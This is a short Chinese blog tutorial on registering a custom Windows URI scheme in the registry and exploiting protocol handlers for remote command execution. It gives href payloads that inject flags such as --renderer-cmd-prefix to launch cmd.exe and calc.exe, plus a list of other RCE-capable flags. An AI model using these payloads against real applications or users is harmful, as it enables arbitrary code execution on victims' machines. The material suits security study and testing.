URI Scheme註冊僞協議實現遠程命令執行
Windows配置註冊表註冊僞協議
一、新建僞協議項
WIN+R 輸入regedit 打開註冊表,在註冊表HKEY_CLASSES_ROOT鍵中新建一個項,項的名字就是你僞協議的名字,例如我註冊一個cmd協議。
而後不用管默認字符串值,新建一個叫URL Procotol的字符串值,值爲空便可。
shell
二、新建shell項
在cmd協議項中新建一個項 , 叫作shell,這個名稱不能改。默認字符串值爲空
windows
三、新建open項
在shell項中新建一個項 , 叫作open,這個名稱不能改。默認字符串值爲空
api
四、新建command項
在open項中新建一個項 , 叫作command,這個名稱不能改。默認字符串值爲可執行文件路徑和參數等
安全
遠程命令執行漏洞
根據這個地方的參數引號閉合狀況去構造payload,相似SQL注入測試
- 是%1 則payload:href='cmd://123 --renderer-cmd-prefix="cmd.exe /c start calc.exe" '
- 要是「%1」則payload:href='cmd://123" --renderer-cmd-prefix="cmd.exe /c start calc.exe '
效果(備註這裏須要使用IE內核測試):
其餘引發RCE的參數以下:
- --renderer-cmd-prefix
- --gpu-launcher
- --utility-cmd-prefix
- --ppapi-plugin-launcher
- --nacl-gdb
- --ppapi-flash-path
- --ppapi-flash-args
參考文獻:
相關文章
- 1. ctf.show web3 文件包含+php僞協議+命令執行
- 2. ssh遠程執行命令
- 3. zabbix執行遠程命令
- 4. WordPress遠程命令執行
- 5. powershel遠程執行命令
- 6. Tomcat遠程命令執行
- 7. SSH 遠程執行命令
- 8. zabbix--遠程執行命令
- 9. Zabbix遠程執行命令
- 10. linux遠程執行命令
- 更多相關文章...
- • Rust 輸出到命令行 - RUST 教程
- • Swift 協議 - Swift 教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
- • Docker 清理命令
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
- 1. Window下Ribbit MQ安裝
- 2. Linux下Redis安裝及集羣搭建
- 3. shiny搭建網站填坑戰略
- 4. Mysql8.0.22安裝與配置詳細教程
- 5. Hadoop安裝及配置
- 6. Python爬蟲初學筆記
- 7. 部署LVS-Keepalived高可用集羣
- 8. keepalived+mysql高可用集羣
- 9. jenkins 公鑰配置
- 10. HA實用詳解
歡迎關注本站公眾號,獲取更多信息
相關文章
- 1. ctf.show web3 文件包含+php僞協議+命令執行
- 2. ssh遠程執行命令
- 3. zabbix執行遠程命令
- 4. WordPress遠程命令執行
- 5. powershel遠程執行命令
- 6. Tomcat遠程命令執行
- 7. SSH 遠程執行命令
- 8. zabbix--遠程執行命令
- 9. Zabbix遠程執行命令
- 10. linux遠程執行命令